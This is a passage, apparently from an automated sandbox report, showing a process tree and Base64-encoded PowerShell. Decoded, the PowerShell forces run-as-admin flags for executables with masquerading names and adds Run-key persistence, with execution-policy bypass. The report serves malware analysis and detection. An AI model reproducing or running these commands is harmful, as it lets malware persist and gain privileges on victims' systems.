QAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAFIAdQBuAHQAaQBtAGUAQgByAG8AbwBrAGUAcgAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAUgB1AG4AdABpAG0AZQBCAHIAbwBvAGsAZQByAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXAB0AHIAYQBmAGYAbQBvAG4AZQB0AGkAegBlAHIAXABhAHAAcABcAFQAZQB4AHQAbABuAHAAdQB0AEgAbwBzAHQALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAdAByAGEAZgBmAG0AbwBuAGUAdABpAHoAZQByAFwAYQBwAHAAXABUAGUAeAB0AGwAbgBwAHUAdABIAG8AcwB0AC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEUAbQBiAG0AYQBrAGUALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBtAGEAawBlAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwAVQBzAGUAcgAwADAAQgBFAEIAcgBvAGsAZQByAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwAQQBQAFAARABBAFQAQQBcAEwATwBDAEEATABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABVAHMAZQByADAAMABCAEUAQgByAG8AawBlAHIALgBlAHgAZQAiACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBTAHkAcwB0AGUAbQBSAG8AbwB0AFwAVABFAE0AUABcAFUAcwBlAHIAMAAwAEIARQBCAHIAbwBrAGUAcgAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABFAG0AYgBlAGQAaQB0AC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAVQBTAEUAUgBQAFIATwBGAEkATABFAFwARQBtAGIAZQBkAGkAdAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBGAG8AcgBjAGUACgAKAE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBMAE0AOgBcAFMAbwBmAHQAdwBhAHIAZQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwAgAE4AVABcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAEEAcABwAEMAbwBtAHAAYQB0AEYAbABhAGcAcwBcAEwAYQB5AGUAcgBzACIAIAAtAE4AYQBtAGUAIAAiACQAZQBuAHYAOgBVAFMARQBSAFAAUgBPAEYASQBMAEUAXABBAFAAUABEAEEAVABBAFwATABPAEMAQQBMAFwAVABFAE0AUABcAEkAcwBhAHMAcwAuAGUAeABlACIAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFUAUwBFAFIAUABSAE8ARgBJAEwARQBcAEEAUABQAEQAQQBUAEEAXABMAE8AQwBBAEwAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBWAGEAbAB1AGUAIAAiAH4AIABSAFUATgBBAFMAQQBEAE0ASQBOACIAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBvAGYAdAB3AGEAcgBlAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzACAATgBUAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAQQBwAHAAQwBvAG0AcABhAHQARgBsAGEAZwBzAFwATABhAHkAZQByAHMAIgAgAC0ATgBhAG0AZQAgACIAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAXABUAEUATQBQAFwASQBzAGEAcwBzAC4AZQB4AGUAIgAgAC0AVgBhAGwAdQBlACAAIgB+ACAAUgBVAE4AQQBTAEEARABNAEkATgAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAIgBIAEsATABNADoAXABTAG8AZgB0AHcAYQByAGUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAIABOAFQAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABBAHAAcABDAG8AbQBwAGEAdABGAGwAYQBnAHMAXABMAGEAeQBlAHIAcwAiACAALQBOAGEAbQBlACAAIgAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdABcAFQARQBNAFAAXABJAHMAYQBzAHMALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAFYAYQBsAHUAZQAgACIAfgAgAFIAVQBOAEEAUwBBAEQATQBJAE4AIgAgAC0ARgBvAHIAYwBlAA==
      4⤵
      Drops file in System32 directory
      Suspicious behavior: EnumeratesProcesses
      PID:2644
    - - C:\Windows\system32\chcp.com
        
        "C:\Windows\system32\chcp.com" 1252
        5⤵
        
        PID:2624
- - C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
    -NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss4A00.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi49DE.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr49DF.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr49F0.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."
    3⤵
    PID:2136
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass -enc YwBoAGMAcAAgADEAMgA1ADIACgAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACcAUwBpAGwAZQBuAHQAbAB5AEMAbwBuAHQAaQBuAHUAZQAnAAoACgBTAGUAdAAtAEUAeABlAGMAdQB0AGkAbwBuAFAAbwBsAGkAYwB5ACAALQBTAGMAbwBwAGUAIABDAHUAcgByAGUAbgB0AFUAcwBlAHIAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBFAHgAZQBjAHUAdABpAG8AbgBQAG8AbABpAGMAeQAgAC0AUwBjAG8AcABlACAATABvAGMAYQBsAE0AYQBjAGgAaQBuAGUAIABCAHkAcABhAHMAcwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAUABSAE8ARwBSAEEATQBEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AFAAUgBPAEcAUgBBAE0ARABBAFQAQQBcAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAuAGUAeABlACIAIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAiAEgASwBDAFUAOgBcAFMATwBGAFQAVwBBAFIARQBcAE0AaQBjAHIAbwBzAG8AZgB0AFwAVwBpAG4AZABvAHcAcwBcAEMAdQByAHIAZQBuAHQAVgBlAHIAcwBpAG8AbgBcAFIAdQBuACIAIAAtAE4AYQBtAGUAIAAiAEIAcgBhAHYAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBQAFIATwBHAFIAQQBNAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByAC4AZQB4AGUAIgAgAC0AVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIALgBlAHgAZQAiACAALQBUAHkAcABlACAAUwB0AHIAaQBuAGcAIAAtAEYAbwByAGMAZQAKAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIARwBvAG8AZwBsAGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQALgBlAHgAZQAiACAALQBQAHIAbwBwAGUAcgB0AHkAVAB5AHAAZQAgAFMAdAByAGkAbgBnACAALQBGAG8AcgBjAGUACgBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsAQwBVADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBHAG8AbwBnAGwAZQBDAHIAYQBzAGgASABhAG4AZABsAGUAcgA2ADQAIgAgAC0AVgBhAGwAdQBlACAAIgAkAGUAbgB2ADoAQQBQAFAARABBAFQAQQBcAEcAbwBvAGcAbABlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoACgBOAGUAdwAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAAIgBIAEsATABNADoAXABTAE8ARgBUAFcAQQBSAEUAXABNAGkAYwByAG8AcwBvAGYAdABcAFcAaQBuAGQAbwB3AHMAXABDAHUAcgByAGUAbgB0AFYAZQByAHMAaQBvAG4AXABSAHUAbgAiACAALQBOAGEAbQBlACAAIgBCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0ACIAIAAtAFYAYQBsAHUAZQAgACIAJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAXABCAHIAYQB2AGUAQwByAGEAcwBoAEgAYQBuAGQAbABlAHIANgA0AC4AZQB4AGUAIgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoAUwBlAHQALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEwATQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAiACAALQBWAGEAbAB1AGUAIAAiACQAZQBuAHYAOgBBAFAAUABEAEEAVABBAFwAQgByAGEAdgBlAEMAcgBhAHMAaABIAGEAbgBkAGwAZQByADYANAAuAGUAeABlACIAIAAtAFQAeQBwAGUAIABTAHQAcgBpAG4AZwAgAC0ARgBvAHIAYwBlAAoATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgB